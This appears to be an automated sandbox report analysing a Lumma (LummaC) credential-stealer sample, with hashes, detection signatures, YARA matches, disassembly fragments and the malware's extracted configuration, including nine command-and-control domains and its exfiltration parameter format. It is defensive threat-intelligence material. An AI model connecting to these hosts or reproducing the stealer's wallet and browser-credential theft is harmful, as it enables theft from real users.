Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe
Analysis ID:	1466390
MD5:	1ee22348c50e6aa7c055ae0e006a96ab
SHA1:	cd567a91bff85257a82d6c397502e5556779075b
SHA256:	ff4c03965c0c4c428eaa7ddbb442ae1537e78efb0d9ec07a10f793b7d6153a58
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe" MD5: 1EE22348C50E6AA7C055AE0E006A96AB)

WerFault.exe (PID: 7804 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7344 -s 1640 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "stationacutwo.shop"], "Build id": "P6Mk0M--key"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1949210599.0000000002B16000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1961272232.0000000002B16000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2156496909.0000000002AC1000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x13c8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1974922177.0000000002B39000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1974177524.0000000002B38000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1949376652.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1973966010.0000000002B16000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1961407186.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe PID: 7344	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe PID: 7344	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe PID: 7344	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 8 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.3.SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe.2a20000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "stationacutwo.shop"], "Build id": "P6Mk0M--key"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: benchillppwo.shop
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: publicitttyps.shop
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: answerrsdo.shop
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: radiationnopp.shop
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: affecthorsedpo.shop
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: bargainnykwo.shop
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: bannngwko.shop
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: bouncedgowp.shop
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: stationacutwo.shop
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: P6Mk0M--key

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Code function: 0_2_0041718B CryptUnprotectData,

0_2_0041718B

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe.400000.0.unpack

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_0041003F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi+28h]	0_2_00427141
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_00410950
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041718B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, dword ptr [esp+68h]	0_2_00418192
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00418192
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	0_2_0041B260
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	0_2_00416380
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_00416380
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	0_2_00418C50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E4AA2089h	0_2_00421570
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_0040A660
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_0041773E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then add edi, 02h	0_2_0041773E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_0041773E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp ecx	0_2_0041773E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h	0_2_0041107B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000574h]	0_2_004260F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ebx], dl	0_2_004260F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then inc esi	0_2_0043A090
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_0041289B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	0_2_004390BE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp edx	0_2_00436162
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ebx, dword ptr [esp+58h]	0_2_00425920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, esi	0_2_00425920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov dword ptr [esp+000000B8h], 00000000h	0_2_00413985
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp edx	0_2_004399A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then inc esi	0_2_004399A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_004269B6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_00426A5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then inc ebx	0_2_00416210
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_004242B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_00438351
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00403BC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, dword ptr [esi]	0_2_0040CBCC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esp+50h]	0_2_004143D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_004383E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00431B90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp ecx	0_2_00417C74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov word ptr [edi], cx	0_2_00438C15
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp cl, 0000002Eh	0_2_00421C19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, esi	0_2_004234DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ebx, edi	0_2_0043A480
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp cl, 0000002Eh	0_2_00421C8F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp ecx	0_2_00417C90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], B33E16A3h	0_2_00415CA2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp eax	0_2_00401D64
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00426660
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp edx	0_2_00439E00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then inc esi	0_2_00439E00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	0_2_00402E80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00425680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 00D23749h	0_2_0041D75D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_0041D75D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp edx	0_2_0041D75D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [004434ECh]	0_2_0041D75D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp edx	0_2_00439F10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then inc esi	0_2_00439F10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0040E7D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then dec edi	0_2_0041FF85
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	0_2_0041FF85
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then dec ebx	0_2_0041FF85
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_028C02A6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h	0_2_028C12E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp edx	0_2_028EA21D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp edx	0_2_028CE257
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi+28h]	0_2_028D73A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp edx	0_2_028E63C9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, dword ptr [esp+68h]	0_2_028C83F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	0_2_028D03F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then dec ebx	0_2_028D03F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	0_2_028E9325
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000574h]	0_2_028D6357
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ebx], dl	0_2_028D6357
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	0_2_028B30E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp eax	0_2_028B203D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esp+50h]	0_2_028C463A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_028E864A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E4AA2089h	0_2_028D17D7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_028C772D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	0_2_028C6739
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, esi	0_2_028D3743
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_028CDA94
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then inc esi	0_2_028EA4B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	0_2_028CB4C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [004434ECh]	0_2_028CE403
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then inc ebx	0_2_028C6477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_028E85B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_028D4519
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	0_2_028D0510
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then dec ebx	0_2_028D0510
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_028CDA94
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_028BEA37
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_028C8A6E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esi]	0_2_028C7A74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_028C0BB7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov dword ptr [esp+000000B8h], 00000000h	0_2_028C3BEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then add edi, 02h	0_2_028C7BE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_028C7BE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ebx, edi	0_2_028EA88B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_028C6899
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_028D68C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	0_2_028BA8C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_028D58E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 00D23749h	0_2_028CD9DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_028D58E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp ecx	0_2_028C7EA3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	0_2_028C8EB7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp ecx	0_2_028C7EDB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_028B3E27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov word ptr [edi], cx	0_2_028E8E7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then jmp eax	0_2_028B1F8F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp cl, 0000002Eh	0_2_028D1FBE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], B33E16A3h	0_2_028C5F09
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_028D6CC6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_028D6C1D
